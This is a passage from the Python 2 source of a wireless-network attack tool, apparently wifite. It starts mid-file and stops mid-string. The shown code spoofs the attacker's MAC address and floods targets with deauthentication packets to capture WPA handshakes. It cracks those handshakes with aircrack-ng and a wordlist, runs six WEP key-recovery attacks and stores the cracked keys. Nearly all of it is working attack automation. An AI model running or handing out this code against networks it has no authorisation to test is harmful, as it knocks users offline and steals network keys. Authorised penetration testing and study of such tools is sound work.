FUNCTIONS # ###################### def wps_check_targets(targets, cap_file, verbose=True): """ Uses reaver's "walsh" (or wash) program to check access points in cap_file for WPS functionality. Sets "wps" field of targets that match to True. """ global RUN_CONFIG if not program_exists('walsh') and not program_exists('wash'): RUN_CONFIG.WPS_DISABLE = True # Tell 'scan' we were unable to execute walsh return program_name = 'walsh' if program_exists('walsh') else 'wash' if len(targets) == 0 or not os.path.exists(cap_file): return if verbose: print GR + ' [+]' + W + ' checking for ' + G + 'WPS compatibility' + W + '...', stdout.flush() cmd = [program_name, '-f', cap_file, '-C'] # ignore Frame Check Sum errors proc_walsh = Popen(cmd, stdout=PIPE, stderr=DN) proc_walsh.wait() for line in proc_walsh.communicate()[0].split('\n'): if line.strip() == '' or line.startswith('Scanning for'): continue bssid = line.split(' ')[0] for t in targets: if t.bssid.lower() == bssid.lower(): t.wps = True if verbose: print 'done' removed = 0 if not RUN_CONFIG.WPS_DISABLE and RUN_CONFIG.WPA_DISABLE: i = 0 while i < len(targets): if not targets[i].wps and targets[i].encryption.find('WPA') != -1: removed += 1 targets.pop(i) else: i += 1 if removed > 0 and verbose: print GR + ' [+]' + O + ' removed %d non-WPS-enabled targets%s' % (removed, W) def print_and_exec(cmd): """ Prints and executes command "cmd". Also waits half a second Used by rtl8187_fix (for prettiness) """ print '\r \r', stdout.flush() print O + ' [!] ' + W + 'executing: ' + O + ' '.join(cmd) + W, stdout.flush() call(cmd, stdout=DN, stderr=DN) time.sleep(0.1) #################### # HELPER FUNCTIONS # #################### def remove_airodump_files(prefix): """ Removes airodump output files for whatever file prefix ('wpa', 'wep', etc) Used by wpa_get_handshake() and attack_wep() """ global RUN_CONFIG remove_file(prefix + '-01.cap') remove_file(prefix + '-01.csv') remove_file(prefix + '-01.kismet.csv') remove_file(prefix + '-01.kismet.netxml') for filename in os.listdir(RUN_CONFIG.temp): if filename.lower().endswith('.xor'): remove_file(RUN_CONFIG.temp + filename) for filename in os.listdir('.'): if filename.startswith('replay_') and filename.endswith('.cap'): remove_file(filename) if filename.endswith('.xor'): remove_file(filename) # Remove .cap's from previous attack sessions """i = 2 while os.path.exists(temp + 'wep-' + str(i) + '.cap'): os.remove(temp + 'wep-' + str(i) + '.cap') i += 1 """ def remove_file(filename): """ Attempts to remove a file. Does not throw error if file is not found. """ try: os.remove(filename) except OSError: pass def program_exists(program): """ Uses 'which' (linux command) to check if a program is installed. """ proc = Popen(['which', program], stdout=PIPE, stderr=PIPE) txt = proc.communicate() if txt[0].strip() == '' and txt[1].strip() == '': return False if txt[0].strip() != '' and txt[1].strip() == '': return True return not (txt[1].strip() == '' or txt[1].find('no %s in' % program) != -1) def sec_to_hms(sec): """ Converts integer sec to h:mm:ss format """ if sec <= -1: return '[endless]' h = sec / 3600 sec %= 3600 m = sec / 60 sec %= 60 return '[%d:%02d:%02d]' % (h, m, sec) def send_interrupt(process): """ Sends interrupt signal to process's PID. """ try: os.kill(process.pid, SIGINT) # os.kill(process.pid, SIGTERM) except OSError: pass # process cannot be killed except TypeError: pass # pid is incorrect type except UnboundLocalError: pass # 'process' is not defined except AttributeError: pass # Trying to kill "None" def get_mac_address(iface): """ Returns MAC address of "iface". """ proc = Popen(['ifconfig', iface], stdout=PIPE, stderr=DN) proc.wait() mac = '' first_line = proc.communicate()[0].split('\n')[0] for word in first_line.split(' '): if word != '': mac = word if mac.find('-') != -1: mac = mac.replace('-', ':') if len(mac) > 17: mac = mac[0:17] return mac def generate_random_mac(old_mac): """ Generates a random MAC address. Keeps the same vender (first 6 chars) of the old MAC address (old_mac). Returns string in format old_mac[0:9] + :XX:XX:XX where X is random hex """ random.seed() new_mac = old_mac[:8].lower().replace('-', ':') for i in xrange(0, 6): if i % 2 == 0: new_mac += ':' new_mac += '0123456789abcdef'[random.randint(0, 15)] # Prevent generating the same MAC address via recursion. if new_mac == old_mac: new_mac = generate_random_mac(old_mac) return new_mac def mac_anonymize(iface): """ Changes MAC address of 'iface' to a random MAC. Only randomizes the last 6 digits of the MAC, so the vender says the same. Stores old MAC address and the interface in ORIGINAL_IFACE_MAC """ global RUN_CONFIG if RUN_CONFIG.DO_NOT_CHANGE_MAC: return if not program_exists('ifconfig'): return # Store old (current) MAC address proc = Popen(['ifconfig', iface], stdout=PIPE, stderr=DN) proc.wait() for word in proc.communicate()[0].split('\n')[0].split(' '): if word != '': old_mac = word RUN_CONFIG.ORIGINAL_IFACE_MAC = (iface, old_mac) new_mac = generate_random_mac(old_mac) call(['ifconfig', iface, 'down']) print GR + " [+]" + W + " changing %s's MAC from %s to %s..." % (G + iface + W, G + old_mac + W, O + new_mac + W), stdout.flush() proc = Popen(['ifconfig', iface, 'hw', 'ether', new_mac], stdout=PIPE, stderr=DN) proc.wait() call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN) print 'done' def mac_change_back(): """ Changes MAC address back to what it was before attacks began. """ global RUN_CONFIG iface = RUN_CONFIG.ORIGINAL_IFACE_MAC[0] old_mac = RUN_CONFIG.ORIGINAL_IFACE_MAC[1] if iface == '' or old_mac == '': return print GR + " [+]" + W + " changing %s's mac back to %s..." % (G + iface + W, G + old_mac + W), stdout.flush() call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN) proc = Popen(['ifconfig', iface, 'hw', 'ether', old_mac], stdout=PIPE, stderr=DN) proc.wait() call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN) print "done" def get_essid_from_cap(bssid, capfile): """ Attempts to get ESSID from cap file using BSSID as reference. Returns '' if not found. """ if not program_exists('tshark'): return '' cmd = ['tshark', '-r', capfile, '-R', 'wlan.fc.type_subtype == 0x05 && wlan.sa == %s' % bssid, '-n'] proc = Popen(cmd, stdout=PIPE, stderr=DN) proc.wait() for line in proc.communicate()[0].split('\n'): if line.find('SSID=') != -1: essid = line[line.find('SSID=') + 5:] print GR + ' [+]' + W + ' guessed essid: %s' % (G + essid + W) return essid print R + ' [!]' + O + ' unable to guess essid!' + W return '' def get_bssid_from_cap(essid, capfile): """ Returns first BSSID of access point found in cap file. This is not accurate at all, but it's a good guess. Returns '' if not found. """ global RUN_CONFIG if not program_exists('tshark'): return '' # Attempt to get BSSID based on ESSID if essid != '': cmd = ['tshark', '-r', capfile, '-R', 'wlan_mgt.ssid == "%s" && wlan.fc.type_subtype == 0x05' % (essid), '-n', # Do not resolve MAC vendor names '-T', 'fields', # Only display certain fields '-e', 'wlan.sa'] # souce MAC address proc = Popen(cmd, stdout=PIPE, stderr=DN) proc.wait() bssid = proc.communicate()[0].split('\n')[0] if bssid != '': return bssid cmd = ['tshark', '-r', capfile, '-R', 'eapol', '-n'] proc = Popen(cmd, stdout=PIPE, stderr=DN) proc.wait() for line in proc.communicate()[0].split('\n'): if line.endswith('Key (msg 1/4)') or line.endswith('Key (msg 3/4)'): while line.startswith(' ') or line.startswith('\t'): line = line[1:] line = line.replace('\t', ' ') while line.find(' ') != -1: line = line.replace(' ', ' ') return line.split(' ')[2] elif line.endswith('Key (msg 2/4)') or line.endswith('Key (msg 4/4)'): while line.startswith(' ') or line.startswith('\t'): line = line[1:] line = line.replace('\t', ' ') while line.find(' ') != -1: line = line.replace(' ', ' ') return line.split(' ')[4] return '' def attack_interrupted_prompt(): """ Promps user to decide if they want to exit, skip to cracking WPA handshakes, or continue attacking the remaining targets (if applicable). returns True if user chose to exit complete, False otherwise """ global RUN_CONFIG should_we_exit = False # If there are more targets to attack, ask what to do next if RUN_CONFIG.TARGETS_REMAINING > 0: options = '' print GR + "\n [+] %s%d%s target%s remain%s" % (G, RUN_CONFIG.TARGETS_REMAINING, W, '' if RUN_CONFIG.TARGETS_REMAINING == 1 else 's', 's' if RUN_CONFIG.TARGETS_REMAINING == 1 else '') print GR + " [+]" + W + " what do you want to do?" options += G + 'c' + W print G + " [c]ontinue" + W + " attacking targets" if len(RUN_CONFIG.WPA_CAPS_TO_CRACK) > 0: options += W + ', ' + O + 's' + W print O + " [s]kip" + W + " to cracking WPA cap files" options += W + ', or ' + R + 'e' + W print R + " [e]xit" + W + " completely" ri = '' while ri != 'c' and ri != 's' and ri != 'e': ri = raw_input(GR + ' [+]' + W + ' please make a selection (%s): ' % options) if ri == 's': RUN_CONFIG.TARGETS_REMAINING = -1 # Tells start() to ignore other targets, skip to cracking elif ri == 'e': should_we_exit = True return should_we_exit # # Abstract base class for attacks. # Attacks are required to implement the following methods: # RunAttack - Initializes the attack # EndAttack - Cleanly ends the attack # class Attack(object): __metaclass__ = abc.ABCMeta @abc.abstractmethod def RunAttack(self): raise NotImplementedError() @abc.abstractmethod def EndAttack(self): raise NotImplementedError() ################# # WPA FUNCTIONS # ################# class WPAAttack(Attack): def __init__(self, iface, target, clients, config): self.iface = iface self.clients = clients self.target = target self.RUN_CONFIG = config def RunAttack(self): ''' Abstract method for initializing the WPA attack ''' self.wpa_get_handshake() def EndAttack(self): ''' Abstract method for ending the WPA attack ''' pass def wpa_get_handshake(self): """ Opens an airodump capture on the target, dumping to a file. During the capture, sends deauthentication packets to the target both as general deauthentication packets and specific packets aimed at connected clients. Waits until a handshake is captured. "iface" - interface to capture on "target" - Target object containing info on access point "clients" - List of Client objects associated with the target Returns True if handshake was found, False otherwise """ if self.RUN_CONFIG.WPA_ATTACK_TIMEOUT <= 0: self.RUN_CONFIG.WPA_ATTACK_TIMEOUT = -1 # Generate the filename to save the .cap file as _aa-bb-cc-dd-ee-ff.cap save_as = self.RUN_CONFIG.WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', self.target.ssid) \ + '_' + self.target.bssid.replace(':', '-') + '.cap' # Check if we already have a handshake for this SSID... If we do, generate a new filename save_index = 0 while os.path.exists(save_as): save_index += 1 save_as = self.RUN_CONFIG.WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', self.target.ssid) \ + '_' + self.target.bssid.replace(':', '-') \ + '_' + str(save_index) + '.cap' # Remove previous airodump output files (if needed) remove_airodump_files(self.RUN_CONFIG.temp + 'wpa') # Start of large Try-Except; used for catching keyboard interrupt (Ctrl+C) try: # Start airodump-ng process to capture handshakes cmd = ['airodump-ng', '-w', self.RUN_CONFIG.temp + 'wpa', '-c', self.target.channel, '--bssid', self.target.bssid, self.iface] proc_read = Popen(cmd, stdout=DN, stderr=DN) # Setting deauthentication process here to avoid errors later on proc_deauth = None print ' %s starting %swpa handshake capture%s on "%s"' % \ (GR + sec_to_hms(self.RUN_CONFIG.WPA_ATTACK_TIMEOUT) + W, G, W, G + self.target.ssid + W) got_handshake = False seconds_running = 0 seconds_since_last_deauth = 0 target_clients = self.clients[:] client_index = -1 start_time = time.time() # Deauth and check-for-handshake loop while not got_handshake and ( self.RUN_CONFIG.WPA_ATTACK_TIMEOUT <= 0 or seconds_running < self.RUN_CONFIG.WPA_ATTACK_TIMEOUT): if proc_read.poll() != None: print "" print "airodump-ng exited with status " + str(proc_read.poll()) print "" break time.sleep(1) seconds_since_last_deauth += int(time.time() - start_time - seconds_running) seconds_running = int(time.time() - start_time) print " \r", print ' %s listening for handshake...\r' % \ (GR + sec_to_hms(self.RUN_CONFIG.WPA_ATTACK_TIMEOUT - seconds_running) + W), stdout.flush() if seconds_since_last_deauth > self.RUN_CONFIG.WPA_DEAUTH_TIMEOUT: seconds_since_last_deauth = 0 # Send deauth packets via aireplay-ng cmd = ['aireplay-ng', '--ignore-negative-one', '-0', # Attack method (Deauthentication) str(self.RUN_CONFIG.WPA_DEAUTH_COUNT), # Number of packets to send '-a', self.target.bssid] client_index += 1 if client_index == -1 or len(target_clients) == 0 or client_index >= len(target_clients): print " %s sending %s deauth to %s*broadcast*%s..." % \ (GR + sec_to_hms(self.RUN_CONFIG.WPA_ATTACK_TIMEOUT - seconds_running) + W, G + str(self.RUN_CONFIG.WPA_DEAUTH_COUNT) + W, G, W), client_index = -1 else: print " %s sending %s deauth to %s... " % \ (GR + sec_to_hms(self.RUN_CONFIG.WPA_ATTACK_TIMEOUT - seconds_running) + W, \ G + str(self.RUN_CONFIG.WPA_DEAUTH_COUNT) + W, \ G + target_clients[client_index].bssid + W), cmd.append('-h') cmd.append(target_clients[client_index].bssid) cmd.append(self.iface) stdout.flush() # Send deauth packets via aireplay, wait for them to complete. proc_deauth = Popen(cmd, stdout=DN, stderr=DN) proc_deauth.wait() print "sent\r", stdout.flush() # Copy current dump file for consistency if not os.path.exists(self.RUN_CONFIG.temp + 'wpa-01.cap'): continue copy(self.RUN_CONFIG.temp + 'wpa-01.cap', self.RUN_CONFIG.temp + 'wpa-01.cap.temp') # Save copy of cap file (for debugging) #remove_file('/root/new/wpa-01.cap') #copy(temp + 'wpa-01.cap', '/root/new/wpa-01.cap') # Check for handshake if self.has_handshake(self.target, self.RUN_CONFIG.temp + 'wpa-01.cap.temp'): got_handshake = True try: os.mkdir(self.RUN_CONFIG.WPA_HANDSHAKE_DIR + os.sep) except OSError: pass # Kill the airodump and aireplay processes send_interrupt(proc_read) send_interrupt(proc_deauth) # Save a copy of the handshake rename(self.RUN_CONFIG.temp + 'wpa-01.cap.temp', save_as) print '\n %s %shandshake captured%s! saved as "%s"' % ( GR + sec_to_hms(seconds_running) + W, G, W, G + save_as + W) self.RUN_CONFIG.WPA_FINDINGS.append( '%s (%s) handshake captured' % (self.target.ssid, self.target.bssid)) self.RUN_CONFIG.WPA_FINDINGS.append('saved as %s' % (save_as)) self.RUN_CONFIG.WPA_FINDINGS.append('') # Strip handshake if needed if self.RUN_CONFIG.WPA_STRIP_HANDSHAKE: self.strip_handshake(save_as) # Add the filename and SSID to the list of 'to-crack' # Cracking will be handled after all attacks are finished. self.RUN_CONFIG.WPA_CAPS_TO_CRACK.append(CapFile(save_as, self.target.ssid, self.target.bssid)) break # Break out of while loop # No handshake yet os.remove(self.RUN_CONFIG.temp + 'wpa-01.cap.temp') # Check the airodump output file for new clients for client in self.RUN_CONFIG.RUN_ENGINE.parse_csv(self.RUN_CONFIG.temp + 'wpa-01.csv')[1]: if client.station != self.target.bssid: continue new_client = True for c in target_clients: if client.bssid == c.bssid: new_client = False break if new_client: print " %s %snew client%s found: %s " % \ (GR + sec_to_hms(self.RUN_CONFIG.WPA_ATTACK_TIMEOUT - seconds_running) + W, G, W, \ G + client.bssid + W) target_clients.append(client) # End of Handshake wait loop. if not got_handshake: print R + ' [0:00:00]' + O + ' unable to capture handshake in time' + W except KeyboardInterrupt: print R + '\n (^C)' + O + ' WPA handshake capture interrupted' + W if attack_interrupted_prompt(): remove_airodump_files(self.RUN_CONFIG.temp + 'wpa') send_interrupt(proc_read) send_interrupt(proc_deauth) print '' self.RUN_CONFIG.exit_gracefully(0) # clean up remove_airodump_files(self.RUN_CONFIG.temp + 'wpa') send_interrupt(proc_read) send_interrupt(proc_deauth) return got_handshake def has_handshake_tshark(self, target, capfile): """ Uses TShark to check for a handshake. Returns "True" if handshake is found, false otherwise. """ if program_exists('tshark'): # Call Tshark to return list of EAPOL packets in cap file. cmd = ['tshark', '-r', capfile, # Input file '-R', 'eapol', # Filter (only EAPOL packets) '-n'] # Do not resolve names (MAC vendors) proc = Popen(cmd, stdout=PIPE, stderr=DN) proc.wait() lines = proc.communicate()[0].split('\n') # Get list of all clients in cap file clients = [] for line in lines: if line.find('appears to have been cut short') != -1 or line.find( 'Running as user "root"') != -1 or line.strip() == '': continue while line.startswith(' '): line = line[1:] while line.find(' ') != -1: line = line.replace(' ', ' ') fields = line.split(' ') # ensure tshark dumped correct info if len(fields) < 5: continue src = fields[2].lower() dst = fields[4].lower() if src == target.bssid.lower() and clients.count(dst) == 0: clients.append(dst) elif dst == target.bssid.lower() and clients.count(src) == 0: clients.append(src) # Check each client for a handshake for client in clients: msg_num = 1 # Index of message in 4-way handshake (starts at 1) for line in lines: if line.find('appears to have been cut short') != -1: continue if line.find('Running as user "root"') != -1: continue if line.strip() == '': continue # Sanitize tshark's output, separate into fields while line[0] == ' ': line = line[1:] while line.find(' ') != -1: line = line.replace(' ', ' ') fields = line.split(' ') # Sometimes tshark doesn't display the full header for "Key (msg 3/4)" on the 3rd handshake. # This catches this glitch and fixes it. if len(fields) < 8: continue elif len(fields) == 8: fields.append('(msg') fields.append('3/4)') src = fields[2].lower() # Source MAC address dst = fields[4].lower() # Destination MAC address if len(fields) == 12: # "Message x of y" format msg = fields[9][0] else: msg = fields[-1][0] # First, third msgs in 4-way handshake are from the target to client if msg_num % 2 == 1 and (src != target.bssid.lower() or dst != client): continue # Second, fourth msgs in 4-way handshake are from client to target elif msg_num % 2 == 0 and (dst != target.bssid.lower() or src != client): continue # The messages must appear in sequential order. try: if int(msg) != msg_num: continue except ValueError: continue msg_num += 1 # We need the first 4 messages of the 4-way handshake # Although aircrack-ng cracks just fine with only 3 of the messages... if msg_num >= 4: return True return False def has_handshake_cowpatty(self, target, capfile, nonstrict=True): """ Uses cowpatty to check for a handshake. Returns "True" if handshake is found, false otherwise. """ if not program_exists('cowpatty'): return False # Call cowpatty to check if capfile contains a valid handshake. cmd = ['cowpatty', '-r', capfile, # input file '-s', target.ssid, # SSID '-c'] # Check for handshake # Uses frames 1, 2, or 3 for key attack if nonstrict: cmd.append('-2') proc = Popen(cmd, stdout=PIPE, stderr=DN) proc.wait() response = proc.communicate()[0] if response.find('incomplete four-way handshake exchange') != -1: return False elif response.find('Unsupported or unrecognized pcap file.') != -1: return False elif response.find('Unable to open capture file: Success') != -1: return False return True def has_handshake_pyrit(self, target, capfile): """ Uses pyrit to check for a handshake. Returns "True" if handshake is found, false otherwise. """ if not program_exists('pyrit'): return False # Call pyrit to "Analyze" the cap file's handshakes. cmd = ['pyrit', '-r', capfile, 'analyze'] proc = Popen(cmd, stdout=PIPE, stderr=DN) proc.wait() hit_essid = False for line in proc.communicate()[0].split('\n'): # Iterate over every line of output by Pyrit if line == '' or line == None: continue if line.find("AccessPoint") != -1: hit_essid = (line.find("('" + target.ssid + "')") != -1) and \ (line.lower().find(target.bssid.lower()) != -1) #hit_essid = (line.lower().find(target.bssid.lower())) else: # If Pyrit says it's good or workable, it's a valid handshake. if hit_essid and (line.find(', good, ') != -1 or \ line.find(', workable, ') != -1): return True return False def has_handshake_aircrack(self, target, capfile): """ Uses aircrack-ng to check for handshake. Returns True if found, False otherwise. """ if not program_exists('aircrack-ng'): return False crack = 'echo "" | aircrack-ng -a 2 -w - -b ' + target.bssid + ' ' + capfile proc_crack = Popen(crack, stdout=PIPE, stderr=DN, shell=True) proc_crack.wait() txt = proc_crack.communicate()[0] return (txt.find('Passphrase not in dictionary') != -1) def has_handshake(self, target, capfile): """ Checks if .cap file contains a handshake. Returns True if handshake is found, False otherwise. """ valid_handshake = True tried = False if self.RUN_CONFIG.WPA_HANDSHAKE_TSHARK: tried = True valid_handshake = self.has_handshake_tshark(target, capfile) if valid_handshake and self.RUN_CONFIG.WPA_HANDSHAKE_COWPATTY: tried = True valid_handshake = self.has_handshake_cowpatty(target, capfile) # Use CowPatty to check for handshake. if valid_handshake and self.RUN_CONFIG.WPA_HANDSHAKE_COWPATTY: tried = True valid_handshake = self.has_handshake_cowpatty(target, capfile) # Check for handshake using Pyrit if applicable if valid_handshake and self.RUN_CONFIG.WPA_HANDSHAKE_PYRIT: tried = True valid_handshake = self.has_handshake_pyrit(target, capfile) # Check for handshake using aircrack-ng if valid_handshake and self.RUN_CONFIG.WPA_HANDSHAKE_AIRCRACK: tried = True valid_handshake = self.has_handshake_aircrack(target, capfile) if tried: return valid_handshake print R + ' [!]' + O + ' unable to check for handshake: all handshake options are disabled!' self.RUN_CONFIG.exit_gracefully(1) def strip_handshake(self, capfile): """ Uses Tshark or Pyrit to strip all non-handshake packets from a .cap file File in location 'capfile' is overwritten! """ output_file = capfile if program_exists('pyrit'): cmd = ['pyrit', '-r', capfile, '-o', capfile + '.temp', 'stripLive'] call(cmd, stdout=DN, stderr=DN) rename(capfile + '.temp', output_file) elif program_exists('tshark'): # strip results with tshark cmd = ['tshark', '-r', capfile, # input file '-R', 'eapol || wlan_mgt.tag.interpretation', # filter '-w', capfile + '.temp'] # output file proc_strip = call(cmd, stdout=DN, stderr=DN) rename(capfile + '.temp', output_file) else: print R + " [!]" + O + " unable to strip .cap file: neither pyrit nor tshark were found" + W ########################## # WPA CRACKING FUNCTIONS # ########################## def wpa_crack(capfile, RUN_CONFIG): """ Cracks cap file using aircrack-ng This is crude and slow. If people want to crack using pyrit or cowpatty or oclhashcat, they can do so manually. """ if RUN_CONFIG.WPA_DICTIONARY == '': print R + ' [!]' + O + ' no WPA dictionary found! use -dict command-line argument' + W return False print GR + ' [0:00:00]' + W + ' cracking %s with %s' % (G + capfile.ssid + W, G + 'aircrack-ng' + W) start_time = time.time() cracked = False remove_file(RUN_CONFIG.temp + 'out.out') remove_file(RUN_CONFIG.temp + 'wpakey.txt') cmd = ['aircrack-ng', '-a', '2', # WPA crack '-w', RUN_CONFIG.WPA_DICTIONARY, # Wordlist '-l', RUN_CONFIG.temp + 'wpakey.txt', # Save key to file '-b', capfile.bssid, # BSSID of target capfile.filename] proc = Popen(cmd, stdout=open(RUN_CONFIG.temp + 'out.out', 'a'), stderr=DN) try: kt = 0 # Keys tested kps = 0 # Keys per second while True: time.sleep(1) if proc.poll() != None: # aircrack stopped if os.path.exists(RUN_CONFIG.temp + 'wpakey.txt'): # Cracked inf = open(RUN_CONFIG.temp + 'wpakey.txt') key = inf.read().strip() inf.close() RUN_CONFIG.WPA_FINDINGS.append('cracked wpa key for "%s" (%s): "%s"' % ( G + capfile.ssid + W, G + capfile.bssid + W, C + key + W)) RUN_CONFIG.WPA_FINDINGS.append('') t = Target(capfile.bssid, 0, 0, 0, 'WPA', capfile.ssid) t.key = key RUN_CONFIG.save_cracked(t) print GR + '\n [+]' + W + ' cracked %s (%s)!' % (G + capfile.ssid + W, G + capfile.bssid + W) print GR + ' [+]' + W + ' key: "%s"\n' % (C + key + W) cracked = True else: # Did not crack print R + '\n [!]' + R + 'crack attempt failed' + O + ': passphrase not in dictionary' + W break inf = open(RUN_CONFIG.temp + 'out.out', 'r') lines = inf.read().split('\n') inf.close() outf = open(RUN_CONFIG.temp + 'out.out', 'w') outf.close() for line in lines: i = line.find(']') j = line.find('keys tested', i) if i != -1 and j != -1: kts = line[i + 2:j - 1] try: kt = int(kts) except ValueError: pass i = line.find('(') j = line.find('k/s)', i) if i != -1 and j != -1: kpss = line[i + 1:j - 1] try: kps = float(kpss) except ValueError: pass print "\r %s %s keys tested (%s%.2f keys/sec%s) " % \ (GR + sec_to_hms(time.time() - start_time) + W, G + add_commas(kt) + W, G, kps, W), stdout.flush() except KeyboardInterrupt: print R + '\n (^C)' + O + ' WPA cracking interrupted' + W send_interrupt(proc) try: os.kill(proc.pid, SIGTERM) except OSError: pass return cracked def add_commas(n): """ Receives integer n, returns string representation of n with commas in thousands place. I'm sure there's easier ways of doing this... but meh. """ strn = str(n) lenn = len(strn) i = 0 result = '' while i < lenn: if (lenn - i) % 3 == 0 and i != 0: result += ',' result += strn[i] i += 1 return result ################# # WEP FUNCTIONS # ################# class WEPAttack(Attack): def __init__(self, iface, target, clients, config): self.iface = iface self.target = target self.clients = clients self.RUN_CONFIG = config def RunAttack(self): ''' Abstract method for dispatching the WEP crack ''' self.attack_wep() def EndAttack(self): ''' Abstract method for ending the WEP attack ''' pass def attack_wep(self): """ Attacks WEP-encrypted network. Returns True if key was successfully found, False otherwise. """ if self.RUN_CONFIG.WEP_TIMEOUT <= 0: self.RUN_CONFIG.WEP_TIMEOUT = -1 total_attacks = 6 # 4 + (2 if len(clients) > 0 else 0) if not self.RUN_CONFIG.WEP_ARP_REPLAY: total_attacks -= 1 if not self.RUN_CONFIG.WEP_CHOPCHOP: total_attacks -= 1 if not self.RUN_CONFIG.WEP_FRAGMENT: total_attacks -= 1 if not self.RUN_CONFIG.WEP_CAFFELATTE: total_attacks -= 1 if not self.RUN_CONFIG.WEP_P0841: total_attacks -= 1 if not self.RUN_CONFIG.WEP_HIRTE: total_attacks -= 1 if total_attacks <= 0: print R + ' [!]' + O + ' unable to initiate WEP attacks: no attacks are selected!' return False remaining_attacks = total_attacks print ' %s preparing attack "%s" (%s)' % \ (GR + sec_to_hms(self.RUN_CONFIG.WEP_TIMEOUT) + W, G + self.target.ssid + W, G + self.target.bssid + W) remove_airodump_files(self.RUN_CONFIG.temp + 'wep') remove_file(self.RUN_CONFIG.temp + 'wepkey.txt') # Start airodump process to capture packets cmd_airodump = ['airodump-ng', '-w', self.RUN_CONFIG.temp + 'wep', # Output file name (wep-01.cap, wep-01.csv) '-c', self.target.channel, # Wireless channel '--bssid', self.target.bssid, self.iface] proc_airodump = Popen(cmd_airodump, stdout=DN, stderr=DN) proc_aireplay = None proc_aircrack = None successful = False # Flag for when attack is successful started_cracking = False # Flag for when we have started aircrack-ng client_mac = '' # The client mac we will send packets to/from total_ivs = 0 ivs = 0 last_ivs = 0 for attack_num in xrange(0, 6): # Skip disabled attacks if attack_num == 0 and not self.RUN_CONFIG.WEP_ARP_REPLAY: continue elif attack_num == 1 and not self.RUN_CONFIG.WEP_CHOPCHOP: continue elif attack_num == 2 and not self.RUN_CONFIG.WEP_FRAGMENT: continue elif attack_num == 3 and not self.RUN_CONFIG.WEP_CAFFELATTE: continue elif attack_num == 4 and not self.RUN_CONFIG.WEP_P0841: continue elif attack_num == 5 and not self.RUN_CONFIG.WEP_HIRTE: continue remaining_attacks -= 1 try: if self.wep_fake_auth(self.iface, self.target, sec_to_hms(self.RUN_CONFIG.WEP_TIMEOUT)): # Successful fake auth client_mac = self.RUN_CONFIG.THIS_MAC elif not self.RUN_CONFIG.WEP_IGNORE_FAKEAUTH: send_interrupt(proc_aireplay) send_interrupt(proc_airodump) print R + ' [!]' + O + ' unable to fake-authenticate with target' print R + ' [!]' + O + ' to skip this speed bump, select "ignore-fake-auth" at command-line' return False remove_file(self.RUN_CONFIG.temp + 'arp.cap') # Generate the aireplay-ng arguments based on attack_num and other params cmd = self.get_aireplay_command(self.iface, attack_num, self.target, self.clients, client_mac) if cmd == '': continue if proc_aireplay != None: send_interrupt(proc_aireplay) proc_aireplay = Popen(cmd, stdout=DN, stderr=DN) print '\r %s attacking "%s" via' % ( GR + sec_to_hms(self.RUN_CONFIG.WEP_TIMEOUT) + W, G + self.target.ssid + W), if attack_num == 0: print G + 'arp-replay', elif attack_num == 1: print G + 'chop-chop', elif attack_num == 2: print G + 'fragmentation', elif attack_num == 3: print G + 'caffe-latte', elif attack_num == 4: print G + 'p0841', elif attack_num == 5: print G + 'hirte', print 'attack' + W print ' %s captured %s%d%s ivs @ %s iv/sec' % ( GR + sec_to_hms(self.RUN_CONFIG.WEP_TIMEOUT) + W, G, total_ivs, W, G + '0' + W), stdout.flush() time.sleep(1) if attack_num == 1: # Send a deauth packet to broadcast and all clients *just because!* self.wep_send_deauths(self.iface, self.target, self.clients) last_deauth = time.time() replaying = False time_started = time.time() while time.time() - time_started < self.RUN_CONFIG.WEP_TIMEOUT: # time.sleep(5) for time_count in xrange(0, 6): if self.RUN_CONFIG.WEP_TIMEOUT == -1: current_hms = "[endless]" else: current_hms = sec_to_hms(self.RUN_CONFIG.WEP_TIMEOUT - (time.time() - time_started)) print "\r %s\r" % (GR + current_hms + W), stdout.flush() time.sleep(1) # Calculates total seconds remaining # Check number of IVs captured csv = self.RUN_CONFIG.RUN_ENGINE.parse_csv(self.RUN_CONFIG.temp + 'wep-01.csv')[0] if len(csv) > 0: ivs = int(csv[0].data) print "\r ", print "\r %s captured %s%d%s ivs @ %s%d%s iv/sec" % \ (GR + current_hms + W, G, total_ivs + ivs, W, G, (ivs - last_ivs) / 5, W), if ivs - last_ivs == 0 and time.time() - last_deauth > 30: print "\r %s deauthing to generate packets..." % (GR + current_hms + W), self.wep_send_deauths(self.iface, self.target, self.clients) print "done\r", last_deauth = time.time() last_ivs = ivs stdout.flush() if total_ivs + ivs >= self.RUN_CONFIG.WEP_CRACK_AT_IVS and not started_cracking: # Start cracking cmd = ['aircrack-ng', '-a', '1', '-l', self.RUN_CONFIG.temp + 'wepkey.txt'] #temp + 'wep-01.cap'] # Append all .cap files in temp directory (in case we are resuming) for f in os.listdir(self.RUN_CONFIG.temp): if f.startswith('wep-') and f.endswith('.cap'): cmd.append(self.RUN_CONFIG.temp + f) print "\r %s started %s (%sover %d ivs%s)" % ( GR + current_hms + W, G + 'cracking' + W, G, self.RUN_CONFIG.WEP_CRACK_AT_IVS, W) proc_aircrack = Popen(cmd, stdout=DN, stderr=DN) started_cracking = True # Check if key has been cracked yet. if os.path.exists(self.RUN_CONFIG.temp + 'wepkey.txt'): # Cracked! infile = open(self.RUN_CONFIG.temp + 'wepkey.txt', 'r') key = infile.read().replace('\n', '') infile.close() print '\n\n %s %s %s (%s)! key: "%s"' % ( current_hms, G + 'cracked', self.target.ssid + W, G + self.target.bssid + W, C + key + W) self.RUN_CONFIG.WEP_FINDINGS.append( 'cracked %s (%s), key: "%s"' % (self.target.ssid, self.target.bssid, key)) self.RUN_CONFIG.WEP_FINDINGS.append('') t = Target(self.target.bssid, 0, 0, 0, 'WEP', self.target.ssid) t.key = key self.RUN_CONFIG.save_cracked(t) # Kill processes send_interrupt(proc_airodump) send_interrupt(proc_aireplay) try: os.kill(proc_aireplay, SIGTERM) except: pass send_interrupt(proc_aircrack) # Remove files generated by airodump/aireplay/packetforce time.sleep(0.5) remove_airodump_files(self.RUN_CONFIG.temp + 'wep') remove_file(self.RUN_CONFIG.temp + 'wepkey.txt') return True # Check if aireplay is still executing if proc_aireplay.poll() == None: if replaying: print ', ' + G + 'replaying \r' + W, elif attack_num == 1 or attack_num == 2: print ', waiting for packet \r', stdout.flush() continue # At this point, aireplay has stopped if attack_num != 1 and attack_num != 2: print '\r %s attack failed: %saireplay-ng exited 